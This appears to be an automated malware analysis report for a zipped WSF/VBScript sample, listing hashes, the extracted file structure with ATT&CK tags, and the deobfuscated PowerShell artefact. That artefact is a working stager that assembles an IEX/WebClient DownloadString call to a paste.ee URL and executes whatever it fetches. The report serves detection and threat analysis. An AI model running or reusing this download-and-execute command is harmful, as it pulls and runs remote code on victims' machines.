Malicious

4614600c11d5149be251283e722d32726cb20c[...]d23.zip

ZIP Archive | MD5: 07bc1d10c2f5d35351d6e519309ef0b3 | Size: 3.24 KB | application/zip

Zip Archive, WSF File, VBScript, T1059.005, PowerShell, Batch Command, PowerShell Call, Wscript.Shell, DeObfuscated, Obfuscated

Characteristics
Hash | Hash Value
MD5 | 07bc1d10c2f5d35351d6e519309ef0b3
Sha1 | 156c1a9069df9c2356ac38eaa09b627abe38a9c1
Sha256 | 242c8233fb25e6a0a5add89e66dda791543e80a4e5df0b6e8e614c4bb8fa41b0
Sha384 | fbd0f754d91c65dee2c037edae923269bc0658b1ab11bfb03906f45b5775caeee6d56c26d260229b93b35313c7e9263b
Sha512 | 9548d27be4048b65ec01d2aa6c1d0e6cbecccb0482a60f1956fff9608c493dd52f8f862649c80b005e543a6360b543a03c1d4a2b4d9130e9771d47bc539adbde
SSDeep | 96:RA4dKdC1b42DJIllDk9scFj9atEgBNIqXU:7kElDizk97tWEgBNE
TLSH | 7F612B111D7CFA70D4C29A77B19DA6A0D5AC13DC205572CB244C06B21E225B7CFDB5AB
File Structure
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.zip | Zip Archive, WSF File, VBScript, T1059.005, PowerShell, Batch Command, PowerShell Call, Wscript.Shell, DeObfuscated, Obfuscated | Malicious
4614600c11d5149be251283e722d32726cb20cffd85807b94437446fc5d48d23.bin | Archive Entry, Html, WSF File, VBScript, T1059.005, PowerShell, Batch Command, PowerShell Call, Wscript.Shell, DeObfuscated, Obfuscated | Malicious
[Job Id=manage-quskzyjvyx Name=No Name] | Malicious
[VBScript] #0 | VBScript, T1059.005, PowerShell, Batch Command, PowerShell Call, Wscript.Shell, DeObfuscated, Obfuscated | Malicious
[VBScript] #0.deobfuscated.vbs | DeObfuscated, VBScript, T1059.005 | Malicious
[Command #0] | PowerShell, Batch Command, PowerShell Call, DeObfuscated | Malicious
[PowerShell Command] | PowerShell, DeObfuscated | Malicious
[Deobfuscated PS] | DeObfuscated, PowerShell | Malicious
Artefacts
Name | Value
Deobfuscated PowerShell |

    $ReDrO = $R = "IeX(Ne"
    $RE = $R + "W-OBJ"
    $RED = $RE + "eCT NeT.W"
    $PAC = "eBCL"
    $xx = $PAC + "IeN"
    $RO = $xx + "T).DOWNLO"
    $zz = "ADSTRING('https://paste.ee/r/tuG3r/0')"
    Invoke-Expression ($RED + $RO + $zz)
    powershell $ReDrO
